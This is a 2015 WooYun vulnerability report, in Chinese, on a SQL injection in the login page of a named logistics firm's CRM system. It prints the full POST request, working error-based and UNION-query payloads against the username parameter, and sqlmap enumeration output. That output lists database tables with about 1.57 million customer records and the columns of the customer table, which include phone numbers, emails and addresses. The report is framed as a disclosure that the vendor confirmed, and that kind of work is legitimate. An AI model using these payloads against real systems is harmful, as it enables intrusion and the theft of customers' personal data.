当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142194

漏洞标题:中国物通网某重要系统SQL注射可导致157W客户详细信息泄漏

相关厂商:中国物通网

漏洞作者: 无名人

提交时间:2015-09-20 18:59

修复时间:2015-11-08 11:06

公开时间:2015-11-08 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-20: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

RT,这么大的数据,求走个大厂商啊

详细说明:

漏洞系统:CRM管理系统
漏洞地址:

POST /login.aspx HTTP/1.1
Host: crm.chinawutong.com
Content-Length: 460
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://crm.chinawutong.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://crm.chinawutong.com/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ypyhncvrkcp4jq45istarx55
__VIEWSTATE=%2FwEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy%2BPT8xnnTfEawqVDiAEYGXDvJB04%3D&__EVENTVALIDATION=%2FwEWBgKRyKDLDQLwkrODBALil%2B%2BSAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h%2FDWg&ctl00%24MainContent%24tbxUserName=admin&ctl00%24MainContent%24tbxPassWord=admin&ctl00%24MainContent%24txtCode=cerc&ctl00%24MainContent%24btnLogin=


ctl00$MainContent$tbxUserName参数存在SQL注入

---
Parameter: ctl00$MainContent$tbxUserName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' AND 2866=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2866=2866) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113))) AND 'CzCc'='CzCc&ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=
Type: UNION query
Title: Generic UNION query (NULL) - 33 columns
Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(107)+CHAR(72)+CHAR(90)+CHAR(73)+CHAR(83)+CHAR(65)+CHAR(72)+CHAR(108)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=
---

漏洞证明:

数据库:

1.png


表项数:

Database: WutongCRM
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.WTCRM_HND_ContactRecordOld | 1939015 |
| dbo.WTCRM_HND_ContactRecordOld | 1939015 |
| dbo.WTCRM_HND_CustomerInfo | 1576796 |
| dbo.VS_SYS_LogInfo | 950017 |
| dbo.WTCRM_SYS_LogInfo | 950017 |
| dbo.WTCRM_HND_VerfiyRecord | 684513 |
| dbo.WTCRM_HND_ConsultRecord | 602475 |
| dbo.WTCRM_HND_SeverRecordDelete | 446428 |
| dbo.WTCRM_HND_WorkRecord | 270504 |
| dbo.WTCRM_HND_RelationInfo | 231078 |
| dbo.WTCRM_SYS_EmailRecord | 224168 |
| dbo.WTCRM_HND_AllocateDetail | 191325 |
| dbo.WTCRM_HND_AllocateDetail | 191325 |
| dbo.WTCRM_HND_TemporaryCustomer | 186692 |
| dbo.WTCRM_HND_CensusInfo | 127971 |
| dbo.WTCRM_HND_ModifyInfo | 109814 |
| dbo.WTCRM_HND_ServiceRecord | 100772 |
| dbo.WTCRM_HND_WorkExamine | 63592 |
| dbo.WTCRM_HND_logRespondNotice | 63558 |
| dbo.WTCRM_HND_WXTOpenRecord | 43034 |
| dbo.WTCRM_HND_OrderRecord | 30579 |
| dbo.WTCRM_HND_AdvertRecord | 25792 |
| dbo.WTCRM_HND_OrderInfo | 24946 |
| dbo.WTCRM_HND_OrderPrintRecord | 24536 |
| dbo.WTCRM_PEP_ResumeRecord | 21791 |
| dbo.WTCRM_SYS_BadWord | 19873 |
| dbo.WTCRM_HND_UpdateRecord | 19039 |
| dbo.WTCRM_HND_MemberKindAlter | 13759 |
| dbo.WTCRM_HND_VisitRecord | 12320 |
| dbo.WTCRM_HND_OrderFullRecord | 10035 |
| dbo.WTCRM_HND_logRespondContact | 9745 |
| dbo.WTCRM_HND_ContactExamine | 9732 |
| dbo.WTCRM_PEP_ResumeInfo | 9133 |
| dbo.WTCRM_HND_PerfectDegree | 7435 |
| dbo.WTCRM_HND_UserDelRecord | 7434 |
| dbo.WTCRM_HND_AppliRemind | 6916 |
| dbo.WTCRM_HND_OrderAssociate | 6303 |
| dbo.WTCRM_SYS_PostRecord | 5885 |
| dbo.WTCRM_SYS_KnowledgeRecord | 5800 |
| dbo.WTCRM_SYS_KnowledgeShare | 5061 |
| dbo.WTCRM_HND_MaintainCar | 4987 |
| dbo.WTCRM_HND_Repeal | 4953 |
| dbo.WTCRM_HND_ServeInfo | 3265 |
| dbo.WTCRM_SYS_ListAreas | 3177 |
| dbo.WTCRM_HND_SyncRecord | 3107 |
| dbo.WTCRM_HND_AppliRecord | 3058 |
| dbo.WTCRM_SYS_UserChangeRecord | 2696 |
| dbo.WTCRM_HND_OrderInvoice | 2646 |
| dbo.WTCRM_SYS_DepartureRecord | 2435 |
| dbo.WTCRM_SYS_SalerStore | 2373 |
| dbo.WTCRM_SYS_UserInfo | 2202 |
| dbo.VS_SYS_UserInfo | 2198 |
| dbo.WTCRM_SYS_InvoiceRequest | 1638 |
| dbo.WTCRM_HND_SaleInfoFW | 1626 |
| dbo.WTCRM_HND_SaleInfoFW | 1626 |
| dbo.WTCRM_PEP_Archives | 1315 |
| dbo.WTCRM_PEP_ExamineXZ | 1263 |
| dbo.WTCRM_HND_ProxyMaterialsDetail | 1243 |
| dbo.WTCRM_HND_ProxyMaterialsDetail | 1243 |
| dbo.WTCRM_HND_Application | 1172 |
| cdc.lsn_time_mapping | 990 |
| dbo.WTCRM_HND_OrderSpareMoney | 869 |
| dbo.WTCRM_HND_AdvertOrderChange | 799 |
| dbo.CallAuth | 752 |
| dbo.Hangup | 752 |
| dbo.WTCRM_FWF_Huo | 674 |
| dbo.WTCRM_SYS_ElementInfo | 671 |
| dbo.WTCRM_HND_SaleBusinessPlan | 489 |
| dbo.WTCRM_HND_ComplaintInfo | 438 |
| dbo.WTCRM_PEP_Examine | 393 |
| dbo.WTCRM_PEP_PayCheck | 384 |
| dbo.WTCRM_PEP_PayChange | 353 |
| dbo.WTCRM_SYS_Citys | 337 |
| dbo.WTCRM_FWF_wshiMainline | 313 |
| dbo.WTCRM_HND_JudgeOrder | 275 |
| dbo.WTCRM_PEP_ResignInfo | 268 |
| dbo.CallEstablish | 246 |
| dbo.WTCRM_PEP_Becomes | 240 |
| dbo.WTCRM_PEP_LogisticsGrade | 237 |
| dbo.WTCRM_PEP_ConnectInfo | 230 |
| dbo.WTCRM_FWF_VehicleLine | 209 |
| dbo.WTCRM_FWF_VehicleLine | 209 |
| dbo.WTCRM_SYS_Domain | 187 |
| dbo.WTCRM_SYS_Suggestion | 179 |
| dbo.WTCRM_HND_Impression | 174 |
| dbo.WTCRM_SYS_TeamInfo | 167 |
| dbo.WTCRM_SYS_GroupInfo | 137 |
| dbo.WTCRM_SYS_RoleInfo | 129 |
| dbo.WTCRM_SYS_SubStation | 120 |
| dbo.WTCRM_PEP_StationChange | 113 |
| dbo.WTCRM_PEP_SalerGrade | 95 |
| dbo.WTCRM_PEP_WebAndPosition | 88 |
| dbo.WTCRM_HND_ProxyInfo | 38 |
| dbo.WTCRM_SYS_AllAgents | 38 |
| dbo.WTCRM_SYS_OrderType | 37 |
| dbo.WTCRM_SYS_Materials | 34 |
| dbo.WTCRM_SYS_Provinces | 34 |
| cdc.captured_columns | 33 |
| dbo.WTCRM_HND_ContactExamineS | 33 |
| dbo.WTCRM_SYS_TargetSaler | 26 |
| dbo.WTCRM_HND_OrderVerify | 24 |
| dbo.WTCRM_SYS_Announcement | 24 |
| dbo.WTCRM_SYS_DepartmentInfo | 24 |
| dbo.WTCRM_HND_Elegant | 22 |
| dbo.WTCRM_SYS_OpenAreas | 21 |
| dbo.WTCRM_SYS_VOIDAPPID | 21 |
| dbo.WTCRM_SYS_KeyWords | 17 |
| dbo.WTCRM_SYS_CustomerProtected | 16 |
| dbo.WTCRM_HND_LinkLimits | 14 |
| dbo.WTCRM_HND_TechnologyLog | 14 |
| dbo.WTCRM_PEP_Wonderful | 14 |
| cdc.dbo_WTCRM_SYS_UserInfo_CT | 11 |
| dbo.WTCRM_SYS_Region | 8 |
| dbo.WTCRM_PEP_Recommend | 5 |
| dbo.WTCRM_SYS_BaseLimits | 4 |
| dbo.WTCRM_SYS_TemplateLimits | 4 |
| cdc.change_tables | 1 |
| cdc.index_columns | 1 |
| dbo.WTCRM_FWF_CarTolls | 1 |
| dbo.WTCRM_FWF_PeiHuo | 1 |
| dbo.WTCRM_HND_VipVehicleInfo | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |
| sys.fulltext_system_stopwords | 15829 |
| sys.syscolumns | 11966 |
| sys.all_parameters | 7090 |
| sys.system_parameters | 7090 |
| sys.trace_subclass_values | 5366 |
| sys.all_columns | 4670 |
| sys.system_columns | 4626 |
| sys.trace_event_bindings | 4304 |
| sys.syscomments | 2994 |
| dbo.spt_values | 2508 |
| sys.all_objects | 1934 |
| sys.sysobjects | 1934 |
| sys.system_objects | 1928 |
| sys.database_permissions | 1844 |
| sys.syspermissions | 1844 |
| sys.sysprotects | 1843 |
| sys.all_sql_modules | 1783 |
| sys.system_sql_modules | 1783 |
| sys.dm_audit_actions | 454 |
| sys.spatial_reference_systems | 390 |
| sys.event_notification_event_types | 365 |
| sys.all_views | 354 |
| sys.system_views | 354 |
| sys.trigger_event_types | 245 |
| sys.trace_events | 180 |
| sys.allocation_units | 128 |
| sys.partitions | 116 |
| sys.syscharsets | 114 |
| sys.xml_schema_facets | 112 |
| sys.xml_schema_components | 99 |
| sys.system_components_surface_area_configuration | 95 |
| sys.dm_audit_class_type_map | 83 |
| sys.xml_schema_types | 82 |
| sys.configurations | 70 |
| sys.sysconfigures | 70 |
| sys.syscurconfigs | 70 |
| sys.trace_columns | 66 |
| sys.fulltext_document_types | 50 |
| sys.fulltext_languages | 48 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.syslanguages | 33 |
| sys.securable_classes | 22 |
| sys.trace_categories | 21 |
| sys.xml_schema_component_placements | 18 |
| INFORMATION_SCHEMA.SCHEMATA | 15 |
| sys.schemas | 15 |
| sys.xml_schema_attributes | 15 |
| sys.database_principals | 14 |
| sys.sysusers | 14 |
| sys.database_recovery_status | 13 |
| sys.databases | 13 |
| sys.sysdatabases | 13 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.assembly_types | 3 |
| sys.service_queue_usages | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 910 |
| dbo.backupmediafamily | 455 |
| dbo.backupmediaset | 455 |
| dbo.backupset | 455 |
| dbo.restorefilegroup | 4 |
| dbo.restorefilegroup | 4 |
| dbo.restorehistory | 4 |
| dbo.syspolicy_configuration | 4 |
+--------------------------------------------------+---------+


客户表:

2.png


各种详细信息,太多了

Database: WutongCRM
Table: WTCRM_HND_CustomerInfo
[32 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Area | varchar |
| Attribution | varchar |
| CellPhone | varchar |
| City | varchar |
| CompanyKind | varchar |
| CompanyName | varchar |
| Country | varchar |
| CurrentStatus | varchar |
| CustomerID | int |
| CustomerKind | varchar |
| CustomerName | varchar |
| DataBaseID | int |
| DetailAddress | varchar |
| Email | varchar |
| Fax | varchar |
| IsAdvisory | int |
| IsShow | bit |
| ModifyTime | datetime |
| ModifyUserID | int |
| OrderID | int |
| Position | varchar |
| Province | varchar |
| QQ | varchar |
| RecordMethod | varchar |
| RecordTime | datetime |
| RenewStatus | varchar |
| Role | varchar |
| SaleID | int |
| Sex | varchar |
| TelePhone | varchar |
| UserID | int |
| Verify | int |
+---------------+----------+


4.png


修复方案:

过滤

版权声明:转载请注明来源 无名人@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-24 11:04

厂商回复:

感谢对我们的支持

最新状态:

暂无


漏洞评价:

评论